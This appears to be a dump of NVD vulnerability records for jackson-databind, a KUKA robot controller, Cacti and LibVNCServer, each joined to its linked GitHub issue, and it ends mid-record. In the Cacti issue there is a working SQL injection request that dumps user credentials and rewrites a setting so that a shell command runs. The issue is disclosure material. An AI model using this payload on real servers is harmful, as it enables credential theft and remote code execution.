{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2765" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2765" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B92AF50-0155-471E-B5C4-1CFD95F4B7D0", "versionEndExcluding": "2.9.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2765
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `org.jsecurity:jsecurity`. library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-14195 Reporter(s): Al1ex@knownsec Fix will likely be included in: * 2.9.10.5 * Not considered valid CVE for Jackson 2.10.0 and later (see https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba)
Block one more gadget type (org.jsecurity, CVE-2020-14195)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2765/comments
0
2020-06-13T23:22:50Z
2020-07-16T17:22:08Z
https://github.com/FasterXML/jackson-databind/issues/2765
638,251,364
2,765
1,285
CVE-2020-10268
2020-06-16T18:15:17.027
Critical services for operation can be terminated from windows task manager, bringing the manipulator to a halt. After this a Re-Calibration of the brakes needs to be performed. Be noted that this only can be accomplished either by a Kuka technician or by Kuka issued calibration hardware that interfaces with the manipulator furthering the delay and increasing operational costs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.6, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2550" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2550" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:kuka:kr_c4_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "377A0187-FEE3-48BB-A225-30B13FBC3EF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:kuka:kr_c4:-:*:*:*:*:*:*:*", "matchCriteriaId": "1A25F107-7654-4B4C-BA1E-4B3098AC4568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "749" ]
749
https://github.com/aliasrobotics/RVD/issues/2550
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml { "id": 2550, "title": "RVD#2550: Terminate Critical Services in KUKA controller KR C4", "type": "Vulnerability", "description": "Critical services for operation can be terminated from windows task manager, bringing the manipulator to a halt. After this a Re-Calibration of the brakes needs to be performed. Be noted that this only can be accomplished either by a Kuka technician or by Kuka issued calibration hardware that interfaces with the manipulator furthering the delay and increasing operational costs.", "cwe": "CWE-749", "cve": "CVE-2020-10268", "keywords": [ "Services" ], "system": "KR3R540, KRC4, KSS8.5.7HF1, Win7_Embedded", "vendor": "KUKA Roboter GmbH", "severity": { "rvss-score": 7.1, "rvss-vector": "RVSS:1.0/AV:PR/AC:L/PR:N/UI:N/Y:U/S:U/C:N/I:H/A:H/H:U", "severity-description": "high", "cvss-score": 6.1, "cvss-vector": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/" }, "links": [ "https://cwe.mitre.org/data/definitions/749.html", "https://github.com/aliasrobotics/RVD/issues/2550" ], "flaw": { "phase": "runtime-operation", "specificity": "general issue", "architectural-location": "plataform code", "application": "Windows", "subsystem": "N/A", "package": "N/A", "languages": "Batch", "date-detected": null, "detected-by": "Alias Robotics (group, https://aliasrobotics.com)", "detected-by-method": "testing dynamic, Task manager.", "date-reported": "2020-03-17", "reported-by": "Victor Mayoral Vilches (Alias Robotics)", "reported-by-relationship": "security researcher", "issue": "https://github.com/aliasrobotics/RVD/issues/2550", "reproducibility": "Always", "trace": "Not disclosed", "reproduction": "Not disclosed", "reproduction-image": "Not disclosed" }, "exploitation": { "description": "Not disclosed", "exploitation-image": "Not disclosed", "exploitation-vector": "Not disclosed" }, "mitigation": { "description": "Not disclosed", "pull-request": "Not disclosed", "date-mitigation": null } } ```
RVD#2550: Terminate Critical Services in KUKA controller KR C4
https://api.github.com/repos/aliasrobotics/RVD/issues/2550/comments
0
2020-06-16T17:22:11Z
2020-06-19T07:29:29Z
https://github.com/aliasrobotics/RVD/issues/2550
639,842,815
2,550
1,286
CVE-2020-14295
2020-06-17T14:15:10.617
A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162384/Cacti-1.2.12-SQL-Injection-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162918/Cacti-1.2.12-SQL-Injection-Remote-Command-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3622" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W64CIB6L4HZRVQSWKPDDKXJO4J2XTOXD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKM5G3YNSZDHDZMPCMAHG5B5M2V4XYSE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-03" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162384/Cacti-1.2.12-SQL-Injection-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162918/Cacti-1.2.12-SQL-Injection-Remote-Command-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3622" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W64CIB6L4HZRVQSWKPDDKXJO4J2XTOXD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKM5G3YNSZDHDZMPCMAHG5B5M2V4XYSE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-03" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.12:*:*:*:*:*:*:*", "matchCriteriaId": "697145F3-CB18-45CF-9671-148B10B2F3F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Cacti/cacti/issues/3622
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
# sqli as admin v1.2.12 There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter. ## To Reproduce Steps to reproduce the behavior: call `/cacti/color.php?action=export&header=false&filter=')<SQLI HERE>--+-` ![image](https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png) ## Expected behavior change the following lines : https://github.com/Cacti/cacti/blob/f27e609cadfd7bd5018769f507ee062de49a5e8a/color.php#L754 ``` /* form the 'where' clause for our main sql query */ if (get_request_var('filter') != '') { $sql_where = "WHERE (name LIKE '%" . get_request_var('filter') . "%' OR hex LIKE '%" . get_request_var('filter') . "%')"; } else { $sql_where = ''; } ``` You should do `db_qstr('%' . get_request_var('filter') . '%')` instead of '%" . get_request_var('filter') . "%. ## Additional context - As the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database. ``` GET /cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='touch+/tmp/sqli_from_rce;'+where+name='path_php_binary';--+- ``` - Then call `host.php?action=reindex` and get the shell_exec called with the path_php_binary. ![image](https://user-images.githubusercontent.com/23179648/84865478-932d3900-b078-11ea-93cc-fc3d281ba051.png)
SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)
https://api.github.com/repos/Cacti/cacti/issues/3622/comments
13
2020-06-17T07:02:46Z
2020-10-11T00:06:05Z
https://github.com/Cacti/cacti/issues/3622
640,193,667
3,622
1,287
CVE-2018-21247
2020-06-17T16:15:11.367
An issue was discovered in LibVNCServer before 0.9.13. There is an information leak (of uninitialized memory contents) in the libvncclient/rfbproto.c ConnectToRFBRepeater function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00033.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00055.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00066.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-390195.pdf" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibVNC/libvncserver/compare/LibVNCServer-0.9.12...LibVNCServer-0.9.13" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibVNC/libvncserver/issues/253" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4F6FUH4EFK4NAP6GT4TQRTBKWIRCZLIY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NVP7TJVYJDXDFRHVQ3ENEN3H354QPXEZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00033.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00055.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00066.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-390195.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibVNC/libvncserver/compare/LibVNCServer-0.9.12...LibVNCServer-0.9.13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibVNC/libvncserver/issues/253" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4F6FUH4EFK4NAP6GT4TQRTBKWIRCZLIY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NVP7TJVYJDXDFRHVQ3ENEN3H354QPXEZ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libvnc_project:libvncserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "A03A7282-D445-4E26-98A0-6A1597838D35", "versionEndExcluding": null, "versionEndIncluding": "0.9.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "matchCriteriaId": "B5A6F2F3-4894-4392-8296-3B8DD2679084", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_itc1500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "3A664216-EEA0-423F-8E11-59C746FDEEFE", "versionEndExcluding": "3.2.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_itc1500:-:*:*:*:*:*:*:*", "matchCriteriaId": 